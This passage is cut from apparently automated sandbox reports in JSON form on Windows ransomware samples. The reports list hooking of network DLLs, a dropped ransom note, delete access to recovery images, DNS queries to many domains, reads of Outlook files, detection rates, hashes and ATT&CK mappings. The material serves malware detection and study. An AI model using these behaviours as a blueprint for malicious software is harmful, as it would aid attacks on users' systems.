00000000-00001136-0000010C-7763923\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7951826\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7978790\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7993877", "origin": "API Call", "attck_id": "T1120", "capec_id": "CAPEC-646", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2509417\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2519244\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2538057\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2712414\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2720385\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2726228\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2728359\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2739393\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2746094\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7296095\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7354386\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7379742\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7410849\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7589138\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7652334\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7731315\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7763923\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7951826\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7978790\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7993877", "origin": "API Call", "attck_id": "T1120", "capec_id": "CAPEC-646", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"o.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files", "description": "\"o.exe\" read file \"%APPDATA%\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\compatibility.ini\"\n \"o.exe\" read file \"%APPDATA%\\Mozilla\\Firefox\\profiles.ini\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "hooks-8", "type": 11, "relevance": 10, "name": "Installs hooks/patches the running process", "description": "\"o.exe\" wrote bytes \"c04e257720542677e0652677b53827770000000000d0417600000000c5ea41760000000088ea417600000000e968157582282777ee29277700000000d2691575000000007dbb41760000000009be157500000000ba18417600000000\" to virtual address \"0x76C01000\" (part of module \"NSI.DLL\")\n \"o.exe\" wrote bytes \"fae62277e1a627772e712777ee29277785e222776da0277726e42277d16d2777003d2577804b257700000000ad3774758b2d7475b641747500000000\" to virtual address \"0x745A1000\" (part of module \"WSHTCPIP.DLL\")\n \"o.exe\" wrote bytes \"e7392377e1a627772e712777ee29277785e222776da02777906426773ad52d7726e42277d16d2777003d2577804b257700000000ad3774758b2d7475b641747500000000\" to virtual address \"0x74AE1000\" (part of module \"WSHIP6.DLL\")", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"o.exe\" monitors \"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"o.exe\" monitors \"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"o.exe\" monitors \"\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "capec_id": "CAPEC-647", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-53", "type": 6, "relevance": 10, "name": "Writes a file to the start menu", "description": "\"o.exe\" wrote to file \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\ZFLXA-DECRYPT.html\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-34", "type": 7, "relevance": 10, "name": "Detected very many DNS queries for domains that cannot be resolved", "description": "\"500flats.com\"\n \"alatkeselamatankerja.co\"\n \"aldrovanaluxe.lviv.ua\"\n \"alem.be\"\n \"ananas.kiev.ua\"\n \"aurumwedding.ru\"\n \"babiceresa.com\"\n \"barvybud.com\"\n \"bellytobabyphotographyseattle.com\"\n \"bloghalm.eu\"\n \"canhoopalcity.top\"\n \"carillon7tanphu.com\"\n \"cocnguyetsanthaomeo.com\"\n \"devdev.com.br\"\n \"dutchtraditions.nl\"\n \"ecart.nu\"\n \"evotech.lu\"\n \"faculdadesenacpe.edu.br\"\n \"gofootball24h.com\"\n \"goodapd.website\"\n \"graftedinn.us\"\n \"gstelecom.cf\"\n \"hanaglobalholding.com\"\n \"heartsongroup.com\"\n \"hoteltravel2018.com\"\n \"inescogroup.com\"\n \"ioae.com.vn\"\n \"jamgonkongtrul.org.tw\"\n \"koloritplus.ru\"\n \"krasnaypolyana123.ru\"", "origin": "Network Traffic"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-6", "type": 7, "relevance": 5, "name": "Contacts Random Domain Names", "description": "\"aurumwedding.ru\" seems to be random\n \"barvybud.com\" seems to be random\n \"bloghalm.eu\" seems to be random\n \"parsmoviez.com\" seems to be random\n \"picusglancus.pl\" seems to be random\n \"www.groupwine.fr\" seems to be random\n \"www.himmerlandgolf.dk\" seems to be random\n \"www.krishnagrp.com\" seems to be random\n \"www.n2plus.co.th\" seems to be random\n \"www.reusa.com.br\" seems to be random\n \"www.tikura.com.br\" seems to be random", "origin": "Network Traffic"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\dazuru[1].gif\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\immeso[1].jpg\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\BREQ4FKZ.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\deamhemehe[1].jpg\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\X72GEHSB.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\sosoamseru[1].jpg\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\EO298CVA.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\rusoesam[1].jpg\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\9UV0TTH5.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\fukakekada[1].jpg\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\7XT1H2YZ.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\WFV53UIL.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\amfuzuhe[1].gif\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\TUHEJLB6.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\63TMM885.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\moamdahe[1].bmp\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\MDCB6VPD.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\sethfuzu[1].png\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\RTFWXF6H.htm\" for deletion\n \"C:\\o.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\ruheim[1].jpg\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"o.exe\" opened \"C:\\Recovery\\cf812052-d863-11e7-ae2b-a9d1a6f40333\\boot.sdi\" with delete access\n \"o.exe\" opened \"C:\\Recovery\\cf812052-d863-11e7-ae2b-a9d1a6f40333\\Winre.wim\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\dazuru[1].gif\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\immeso[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\BREQ4FKZ.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\deamhemehe[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\X72GEHSB.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\sosoamseru[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\EO298CVA.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\rusoesam[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\9UV0TTH5.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\fukakekada[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\7XT1H2YZ.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\momohe[1].jpg\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\WFV53UIL.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\amfuzuhe[1].gif\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\TUHEJLB6.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\63TMM885.htm\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\moamdahe[1].bmp\" with delete access\n \"o.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\MDCB6VPD.htm\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "avtest-0", "type": 12, "name": "Sample was identified as malicious by at least one Antivirus engine", "description": "55/67 Antivirus vendors marked sample as malicious (82% detection rate)", "origin": "External System"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET DNS Query to a *.top domain - Likely Hostile\" (SID: 2023883, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"\n Detected alert \"ET INFO DNS Query for Suspicious .ga Domain\" (SID: 2025105, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"\n Detected alert \"ET INFO DNS Query for Suspicious .cf Domain\" (SID: 2025107, Rev: 3, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"o.exe\" touched \"K:\"\n \"o.exe\" touched \"L:\"\n \"o.exe\" touched \"M:\"\n \"o.exe\" touched \"N:\"\n \"o.exe\" touched \"O:\"\n \"o.exe\" touched \"P:\"\n \"o.exe\" touched \"Q:\"\n \"o.exe\" touched \"R:\"\n \"o.exe\" touched \"S:\"\n \"o.exe\" touched \"T:\"\n \"o.exe\" touched \"U:\"\n \"o.exe\" touched \"V:\"\n \"o.exe\" touched \"W:\"\n \"o.exe\" touched \"X:\"\n \"o.exe\" touched \"Y:\"", "origin": "API Call", "attck_id": "T1083", "capec_id": "CAPEC-497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-52", "type": 6, "relevance": 5, "name": "Reads mail related files", "description": "\"o.exe\" read 1048576 bytes from file \"%APPDATA%\\Microsoft\\Outlook\\Outlook.srs\"\n \"o.exe\" read 1048576 bytes from file \"%APPDATA%\\Microsoft\\Outlook\\Outlook.xml\"", "origin": "API Call", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-21", "type": 7, "relevance": 10, "name": "Malicious artifacts seen in the context of a contacted host", "description": "Found malicious artifacts related to \"<IPv4>\": ...\n\n URL: http://<IPv4>:8074/jaisal/Angular_Fitmatch/dist/ (AV positives: 1/93 scanned on 02/07/2022 19:44:08)\n URL: http://<IPv4>/kostenaufstellung.781717582838100889095461.php (AV positives: 1/91 scanned on 10/25/2021 10:43:03)\n URL: http://<IPv4>/ (AV positives: 2/88 scanned on 06/30/2021 06:35:16)\n URL: http://<IPv4>/design/cityfurnish/email/images/logo.png (AV positives: 2/72 scanned on 01/13/2020 11:47:48)\n URL: http://<IPv4>/l8387281564455991793.zip (AV positives: 2/66 scanned on 04/17/2019 09:09:55)\n File SHA256: 1bfba15c5ddf08da9f0dafbe7569f7c31a3904e07cda9da1bfb25777f154a9f3 (AV positives: 3/71 scanned on 06/06/2019 23:50:21)\n File SHA256: fddada15817b6bdbae8d166a021822abe6aaabae9dfd4362acefc19243e5246c (AV positives: 30/60 scanned on 09/13/2018 15:30:54)\n Found malicious artifacts related to \"<IPv4>\": ...\n\n URL: http://<IPv4>/ (AV positives: 4/88 scanned on 06/30/2021 06:35:14)\n URL: https://<IPv4>/ (AV positives: 5/88 scanned on 06/27/2021 03:10:57)\n URL: http://<IPv4>/mpoezwri/uoiuryehr.php?jfs=opa-opa-opa-brazil-song (AV positives: 1/66 scanned on 12/10/2018 06:22:50)\n URL: http://<IPv4>/content/images/seheruesesim.gif (AV positives: 2/69 scanned on 12/06/2018 05:48:02)\n URL: http://<IPv4>/news/pictures/hesefuam.gif (AV positives: 2/69 scanned on 12/06/2018 05:37:02)\n File SHA256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035 (AV positives: 38/60 scanned on 06/25/2018 13:19:43)", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-27", "type": 7, "relevance": 10, "name": "Multiple malicious artifacts seen in the context of different hosts", "description": "Found malicious artifacts related to \"<IPv4>\": ...\n\n URL: http://<IPv4>:8074/jaisal/Angular_Fitmatch/dist/ (AV positives: 1/93 scanned on 02/07/2022 19:44:08)\n URL: http://<IPv4>/kostenaufstellung.781717582838100889095461.php (AV positives: 1/91 scanned on 10/25/2021 10:43:03)\n URL: http://<IPv4>/ (AV positives: 2/88 scanned on 06/30/2021 06:35:16)\n URL: http://<IPv4>/design/cityfurnish/email/images/logo.png (AV positives: 2/72 scanned on 01/13/2020 11:47:48)\n URL: http://<IPv4>/l8387281564455991793.zip (AV positives: 2/66 scanned on 04/17/2019 09:09:55)\n File SHA256: 1bfba15c5ddf08da9f0dafbe7569f7c31a3904e07cda9da1bfb25777f154a9f3 (AV positives: 3/71 scanned on 06/06/2019 23:50:21)\n File SHA256: fddada15817b6bdbae8d166a021822abe6aaabae9dfd4362acefc19243e5246c (AV positives: 30/60 scanned on 09/13/2018 15:30:54)\n Found malicious artifacts related to \"<IPv4>\": ...\n\n URL: http://<IPv4>/ (AV positives: 4/88 scanned on 06/30/2021 06:35:14)\n URL: https://<IPv4>/ (AV positives: 5/88 scanned on 06/27/2021 03:10:57)\n URL: http://<IPv4>/mpoezwri/uoiuryehr.php?jfs=opa-opa-opa-brazil-song (AV positives: 1/66 scanned on 12/10/2018 06:22:50)\n URL: http://<IPv4>/content/images/seheruesesim.gif (AV positives: 2/69 scanned on 12/06/2018 05:48:02)\n URL: http://<IPv4>/news/pictures/hesefuam.gif (AV positives: 2/69 scanned on 12/06/2018 05:37:02)\n File SHA256: 1ba5509373ed47e261ae5cd6e79147e710f0cd177ab1afaf95ed172caefb3035 (AV positives: 38/60 scanned on 06/25/2018 13:19:43)", "origin": "Network Traffic"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-3", "type": 12, "relevance": 10, "name": "Sample was identified as malicious by a large number of Antivirus engines", "description": "55/67 Antivirus vendors marked sample as malicious (82% detection rate)", "origin": "External System"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-5", "type": 12, "relevance": 10, "name": "Sample was identified as malicious by a trusted Antivirus engine", "description": "No specific details available", "origin": "External System"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c
https://hybrid-analysis.com/sample/f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c
Hybrid Analysis - Ransomware
{"size": 18432, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c", "sha256": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c", "av_detect": 83, "vx_family": "Ransom.Imps.Generic", "threat_score": 75, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 113, "extracted_files": [{"name": "RCXCD0E.tmp", "file_path": "%PROGRAMFILES%\\Windows NT\\RCXCD0E.tmp", "file_size": 18432, "sha256": "a8be2621c3632728054a2b008962bcbccd2ec3bbfd4034f6ff056a792cd1d0a8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "explorer.exe", "file_path": "%PROGRAMFILES%\\Windows NT\\explorer.exe", "file_size": 18432, "sha256": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe (PID: 5896)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 9.00 (Visual Studio 2008) (build: 21022)", "1 .C Files (with LTCG) compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 21022)"], "imported_objects": ["17 .LIB Files generated with LIB.EXE 8.00 (Visual Studio 2005) (build: 50727)"], "file_analysis": ["File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 112}, "processes": [{"uid": "00000000-00005896", "name": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe", "normalized_path": "C:\\f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c.exe", "sha256": "f577d4931c05b204bfb3cb8459f8e0622bd0cb64f20de4eb6ddd7aa166f60d5c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 2}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", 